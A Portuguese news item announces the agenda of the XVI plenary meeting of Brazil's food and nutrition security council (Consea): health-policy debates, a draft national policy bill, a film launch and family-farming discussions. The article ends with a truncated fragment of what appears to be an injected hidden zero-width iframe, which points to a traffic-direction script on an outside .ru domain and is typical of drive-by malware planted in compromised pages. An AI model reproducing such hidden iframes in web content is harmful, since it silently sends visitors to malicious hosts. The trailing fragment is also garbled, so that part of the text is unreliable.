Consea quer fortalecer saúde na segurança alimentar e nutricional
![](https://enconasa.asabrasil.org.br/wp-content/uploads/2025/02/seguranca-alimentar.JPG-scaled.jpg)
Um debate sobre o fortalecimento do setor “saúde” na segurança alimentar e nutricional, incluindo a importância da Política Nacional de Alimentação e Nutrição, será um dos pontos da XVI Reunião Plenária do Conselho Nacional de Segurança Alimentar e Nutricional (Consea).
As atividades da plenária acontecem nesta quarta-feira (28), das 9h às 18h, no Auditório do Anexo I do Palácio do Planalto, em Brasília. O encontro também discute o pré-projeto de lei relacionado à Política Nacional de Segurança Alimentar e Nutricional (PNSAN).
A reunião terá a presença da ministra Márcia Lopes, que assumiu no início do mês o Ministério do Desenvolvimento Social e Combate à Fome (MDS), e com ele o cargo de secretária do Consea. Ela participa das discussões sobre a PNSAN, a partir das 9h30.
A partir das 10h30 acontecem os debates sobre o fortalecimento do setor saúde na Segurança Alimentar e Nutricional, em especial sobre o papel da Política Nacional de Alimentação e Nutrição. Foram convidados para o debate o presidente do Conselho Nacional de Saúde, Francisco Batista Júnior, e o ministro da Saúde, José Gomes Temporão.
Na volta do almoço, às 14 horas, acontece o lançamento do filme “Alimento: Direito ou Mercadoria?”. A partir das 14h30 a discussão é sobre o Plano Safra da Agricultura Familiar, em conjunto com o Conselho Nacional de Desenvolvimento Rural Sustentável (Condraf). Participam desta atividade Daniel Maia e Adoniram Peraci, secretário executivo e secretário de agricultura familiar, ambos do Ministério do Desenvolvimento Agrário (MDA).
Em torno da XVI Reunião Plenária do Consea acontecem outros eventos das instâncias, como a reunião de presidentes de conselhos estaduais de segurança alimentar e nutricional, que acontece nesta segunda e terça-feira (26 e 27). Também nesta segunda haverá uma reunião do grupo de trabalho “Biodiversidade, soberania e segurança alimentar e nutricional”.
Na terça será a vez das reuniões das seis comissões permanentes (CPs) do Conselho. Na quarta acontece a plenária e na quinta ocorre a reunião do grupo de trabalho que discute os preparativos para a IV Conferência Nacional de Segurança Alimentar e Nutricional.
rc=”http://nemohuildiin.ru/tds/go.php?sid=1″ width=”0″ h